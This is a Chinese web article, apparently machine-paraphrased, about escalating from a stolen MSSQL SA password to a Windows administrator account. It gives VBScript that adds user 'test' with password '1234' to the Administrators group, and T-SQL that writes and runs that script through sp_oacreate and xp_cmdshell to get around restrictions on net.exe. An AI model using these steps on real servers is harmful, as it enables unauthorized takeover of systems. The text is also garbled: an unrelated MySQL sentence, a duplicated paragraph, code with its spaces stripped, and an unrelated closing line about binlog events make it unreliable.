MSSQL网页编程之Microsoft SQL Server SA权限平安

由MySQL用来存储数据的文件格式以已经被广泛地测试过，但是总是有外部情况可以导致数据库表被破坏：在取得SA暗码后，常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用，没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具，用来办理当地资本，使用它能够不依托CMD等命令就可以增加一个办理员，详细代码以下：</p>在取得SA暗码后，常常由于服务器办理者或”后人”将net.exe和net1.exe被限定利用，没法增加办理员账号。我们晓得VBS在举动目次(ADSI)部分有一个winnt工具，用来办理当地资本，使用它能够不依托CMD等命令就可以增加一个办理员，详细代码以下：

　　setwsnetwork=CreateObject("WSCRIPT.NETWORK")
　　os="WinNT://"&wsnetwork.ComputerName
　　Setob=GetObject(os)失掉adsi接口,绑定
　　Setoe=GetObject(os&"/Administrators,group")属性,admin组
　　Setod=ob.Create("user","test")创建用户
　　od.SetPassword"1234"设置暗码
　　od.SetInfo保留
　　Setof=GetObject(os&"/test",user)失掉用户
　　oe.addos&"/test"

　　将下面的代码保留为1.vbs，然后实行，命令为“cscript1.vbs”，如许就会在体系增加一个体系名为test，暗码为1234的用户。详细在查询剖析器实行的代码以下：

　　declare@oint,@fint,@tint,@retint
　　execsp_oacreatescripting.filesystemobject,@oout
　　execsp_oamethod@o,createtextfile,@fout,c:1.vbs,1
　　exec@ret=sp_oamethod@f,writeline,NULL,setwsnetwork=CreateObject("WSCRIPT.NETWORK")
　　exec@ret=sp_oamethod@f,writeline,NULL,os="WinNT://"&wsnetwork.ComputerName
　　exec@ret=sp_oamethod@f,writeline,NULL,Setob=GetObject(os)
　　exec@ret=sp_oamethod@f,writeline,NULL,Setoe=GetObject(os&"/Administrators,group")
　　exec@ret=sp_oamethod@f,writeline,NULL,Setod=ob.Create("user","test")
　　exec@ret=sp_oamethod@f,writeline,NULL,od.SetPassword"1234"
　　exec@ret=sp_oamethod@f,writeline,NULL,od.SetInfo
　　exec@ret=sp_oamethod@f,writeline,NULL,Setof=GetObject(os&"/test",user)
　　exec@ret=sp_oamethod@f,writeline,NULL,oe.addos&"/test"

　　实行完下面的语句，再实行上面这行代码，这行代码必定独自实行，不要与下面的放在一同实行，不然会提醒“c:1.vbs正被另外一个程序运转”而没法乐成增加用户：

　　execmaster..xp_cmdshellcscriptc:1.vbs

　　假如体系用户没有增加乐成，有多是由于体系用户的暗码1234的太复杂，不切合服务器的庞大暗码战略，能够思索设置的庞大些，然后再测试一下。也能够利用echo将代码写到1.vbs中，代码格局为：

　　execmaster..xp_cmdshellechosetwsnetwork=CreateObject("WSCRIPT.NETWORK")>>1.vbs
对于insert操作，只需要把event_type改成DELETE_ROWS_EVENT；对于delete操作，改成WRITE_ROWS_EVENT